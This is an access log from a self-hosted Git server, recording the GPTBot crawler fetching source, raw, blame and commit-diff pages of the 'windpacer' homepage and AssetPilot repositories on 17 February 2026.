"/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14234] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14845] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15578] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13959] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13813] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13322] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 20436] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 21964] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13814] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15933] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 60690] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15819] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" -[17/Feb/2026:13:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" -[17/Feb/2026:13:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" -[17/Feb/2026:13:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 22385] [Gzip 12.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" -[17/Feb/2026:13:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" -[17/Feb/2026:13:49:01 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 24013] [Gzip 13.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" -[17/Feb/2026:13:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 14458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" -[17/Feb/2026:13:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 16056] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" -[17/Feb/2026:13:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22138] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 60539] [Gzip 8.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 60534] [Gzip 8.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 60561] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 60715] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 14609] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 68307] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23743] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/actions" [Client 74.7.227.38] [Length 7415] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:13:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity" [Client 74.7.227.38] [Length 8596] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:13:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 68072] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 68075] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 68199] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/watchers" [Client 74.7.227.38] [Length 7740] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:13:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 11115] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 74.7.227.38] [Length 16244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" [Client 74.7.227.38] [Length 11427] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 7521] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:13:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/releases" [Client 74.7.227.38] [Length 7424] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:13:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 28967] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/halfweekly" [Client 74.7.227.38] [Length 8390] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:13:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/contributors" [Client 74.7.227.38] [Length 7620] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:13:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/semiyearly" [Client 74.7.227.38] [Length 8604] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:13:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/code-frequency" [Client 74.7.227.38] [Length 7540] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:13:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/quarterly" [Client 74.7.227.38] [Length 8601] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:13:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] 